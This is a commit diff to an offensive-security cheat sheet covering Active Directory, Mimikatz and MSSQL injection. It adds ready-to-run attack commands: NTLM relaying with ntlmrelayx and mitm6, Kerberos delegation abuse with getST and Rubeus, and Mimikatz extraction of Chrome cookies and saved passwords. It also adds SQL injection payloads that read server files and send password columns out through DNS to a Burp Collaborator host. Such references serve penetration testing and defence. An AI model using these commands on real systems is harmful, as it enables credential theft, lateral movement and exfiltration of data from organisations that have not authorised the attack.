Relay + MSSQL Read File

2024-05-12 06:26:08 +02:00 · 2021-03-25 18:25:02 +01:00 · 2021-03-25 18:25:02 +01:00 · 0443babe35
parent f6b9d63bf8
commit 0443babe35
3 changed files with 76 additions and 21 deletions
--- a/Resources/Active
+++ b/Resources/Active
@ -50,7 +50,7 @@
      - [Using impacket](#using-impacket)
      - [Using Rubeus](#using-rubeus)
    - [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
-    - [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
+    - [Man-in-the-Middle attacks & relaying](#man-in-the-middle-attacks--relaying)
      - [MS08-068 NTLM reflection](#ms08-068-ntlm-reflection)
      - [SMB Signing Disabled and IPv4](#smb-signing-disabled-and-ipv4)
      - [SMB Signing Disabled and IPv6](#smb-signing-disabled-and-ipv6)
@ -1436,7 +1436,7 @@ Then crack the hash with `hashcat`
 hashcat -m 5600 -a 0 hash.txt crackstation.txt
 ```

-### NTLMv2 hashes relaying
+### Man-in-the-Middle attacks & relaying

 NTLMv1 and NTLMv2 can be relayed to connect to another machine.

@ -1473,14 +1473,13 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
    HTTP = Off    # Turn this off
    ```
 2. Run `python  RunFinger.py -i IP_Range` to detect machine with `SMB signing`:`disabled`.
-3. Run `python Responder.py -I <interface_card>` and `python MultiRelay.py -t <target_machine_IP> -u ALL`
-4. Also you can use `ntlmrelayx` to dump the SAM database of the targets in the list. 
-    ```powershell
-    ntlmrelayx.py -tf targets.txt
-    ```
+3. Run `python Responder.py -I <interface_card>` 
+4. Use a relay tool such as `ntlmrelayx` or `MultiRelay`
+    - `impacket-ntlmrelayx -tf targets.txt` to dump the SAM database of the targets in the list. 
+    - `python MultiRelay.py -t <target_machine_IP> -u ALL`
 5. ntlmrelayx can also act as a SOCK proxy with every compromised sessions.
    ```powershell
-    $ ntlmrelayx.py -tf /tmp/targets.txt -socks -smb2support
+    $ impacket-ntlmrelayx -tf /tmp/targets.txt -socks -smb2support
    [*] Servers started, waiting for connections
    Type help for list of commands
    ntlmrelayx> socks
@ -1489,12 +1488,18 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
    MSSQL     192.168.48.230  VULNERABLE/ADMINISTRATOR  1433
    SMB       192.168.48.230  CONTOSO/NORMALUSER1       445
    MSSQL     192.168.48.230  CONTOSO/NORMALUSER1       1433
-    
-    $ proxychains smbclient //192.168.48.230/Users -U contoso/normaluser1
-    $ proxychains mssqlclient.py contoso/normaluser1@192.168.48.230 -windows-auth
+
+    # You might need to select a target with "-t"
+    impacket-ntlmrelayx -t mssql://10.10.10.10 -socks -smb2support
+    impacket-ntlmrelayx -t smb://10.10.10.10 -socks -smb2support
+
+    # the socks proxy can then be used with your Impacket tools or CrackMapExec
+    $ proxychains impacket-smbclient //192.168.48.230/Users -U contoso/normaluser1
+    $ proxychains impacket-mssqlclient DOMAIN/USER@10.10.10.10 -windows-auth
+    $ proxychains crackmapexec mssql 10.10.10.10 -u user -p '' -d DOMAIN -q "SELECT 1"   
    ```

-Mitigations:
+**Mitigations**:

 * Disable LLMNR via group policy
    ```powershell
@ -1510,15 +1515,21 @@ Mitigations:
 Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.

 ```powershell
-cme smb $hosts --gen-relay-list relay.txt
+crackmapexec smb $hosts --gen-relay-list relay.txt

 # DNS takeover via IPv6, mitm6 will request an IPv6 address via DHCPv6
+# -d is the domain name that we filter our request on - the attacked domain
+# -i is the interface we have mitm6 listen on for events
 mitm6 -i eth0 -d $domain

 # spoofing WPAD and relaying NTLM credentials
-ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
-or 
-ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
+impacket-ntlmrelayx -6 -wh $attacker_ip -of loot -tf relay.txt
+impacket-ntlmrelayx -6 -wh $attacker_ip -l /tmp -socks -debug
+
+# -ip is the interface you want the relay to run on
+# -wh is for WPAD host, specifying your wpad file to serve
+# -t is the target where you want to relay to. 
+impacket-ntlmrelayx -ip 10.10.10.1 -wh $attacker_ip -t ldaps://10.10.10.2
 ```

 #### Drop the MIC
@ -1984,8 +1995,10 @@ $ Get-DomainComputer -TrustedToAuth | select -exp dnshostname

 # Find the service 
 $ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
+```

-# Exploit with Impacket
+#### Exploit with Impacket
+```ps1
 $ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
 Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

@ -1994,14 +2007,28 @@ Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
 [*]     Requesting S4U2self
 [*]     Requesting S4U2Proxy
 [*] Saving ticket in Administrator.ccache
+```

-# Exploit with Rubeus
+#### Exploit with Rubeus
+```ps1
 $ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
 $ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
 $ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
 $ dir \\dc.domain.com\c$
 ```

+#### Impersonate a domain user on a resource
+
+Require:
+* SYSTEM level privileges on a machine configured with constrained delegation
+
+```ps1
+PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
+PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
+PS> $idToImpersonate.Impersonate()
+PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
+PS> ls \\dc01.offense.local\c$
+```

 ### Kerberos Resource Based Constrained Delegation

--- a/Resources/Windows
+++ b/Resources/Windows
@ -11,6 +11,9 @@
 * [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
 * [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
 * [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
+  * [Chrome Cookies & Credential](#chrome-cookies--credential)
+  * [Task Scheduled credentials](#task-scheduled-credentials)
+  * [Vault](#vault)
 * [Mimikatz - Commands list](#mimikatz---commands-list)
 * [Mimikatz - Powershell version](#mimikatz---powershell-version)
 * [References](#references)
@ -178,8 +181,6 @@ net start sesshijack
 ```


-
-
 ## Mimikatz - Credential Manager & DPAPI

 ```powershell
@ -196,6 +197,17 @@ $ mimikatz !sekurlsa::dpapi
 $ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
 ```

+### Chrome Cookies & Credential
+
+```powershell
+# Saved Cookies
+dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Cookies" /unprotect
+dpapi::chrome /in:"C:\Users\kbell\AppData\Local\Google\Chrome\User Data\Default\Cookies" /masterkey:9a6f199e3d2e698ce78fdeeefadc85c527c43b4e3c5518c54e95718842829b12912567ca0713c4bd0cf74743c81c1d32bbf10020c9d72d58c99e731814e4155b
+
+# Saved Credential in Chrome
+dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /unprotect
+```
+
 ### Task Scheduled credentials

 ```powershell
--- a/Injection/MSSQL
+++ b/Injection/MSSQL
@ -14,6 +14,7 @@
 * [MSSQL Blind Based](#mssql-blind-based)
 * [MSSQL Time Based](#mssql-time-based)
 * [MSSQL Stacked query](#mssql-stacked-query)
+* [MSSQL Read file](#mssql-read-file)
 * [MSSQL Command execution](#mssql-command-execution)
 * [MSSQL Out of band](#mssql-out-of-band)
    * [MSSQL DNS exfiltration](#mssql-dns-exfiltration)
@ -147,6 +148,16 @@ Use a semi-colon ";" to add another query
 ProductID=1; DROP members--
 ```

+
+## MSSQL Read file
+
+**Permissions**: The `BULK` option requires the `ADMINISTER BULK OPERATIONS` or the `ADMINISTER DATABASE BULK OPERATIONS` permission.
+
+```sql
+-1 union select null,(select x from OpenRowset(BULK 'C:\Windows\win.ini',SINGLE_CLOB) R(x)),null,null
+```
+
+
 ## MSSQL Command execution

 ```sql
@ -196,7 +207,12 @@ GO
 Technique from https://twitter.com/ptswarm/status/1313476695295512578/photo/1

 ```powershell
-1 and exists(select * from fn_trace_gettable('\\'%2b(select pass frop users where id=1)%2b'.xxxxxxx.burpcollaborator.net\1.trc',default))
+# Permissions: Requires VIEW SERVER STATE permission on the server.
+1 and exists(select * from fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.xem',null,null))
+
+# Permissions: Requires the CONTROL SERVER permission.
+1 (select 1 where exists(select * from fn_get_audit_file('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\',default,default)))
+1 and exists(select * from fn_trace_gettable('\\'%2b(select pass from users where id=1)%2b'.xxxx.burpcollaborator.net\1.trc',default))
 ```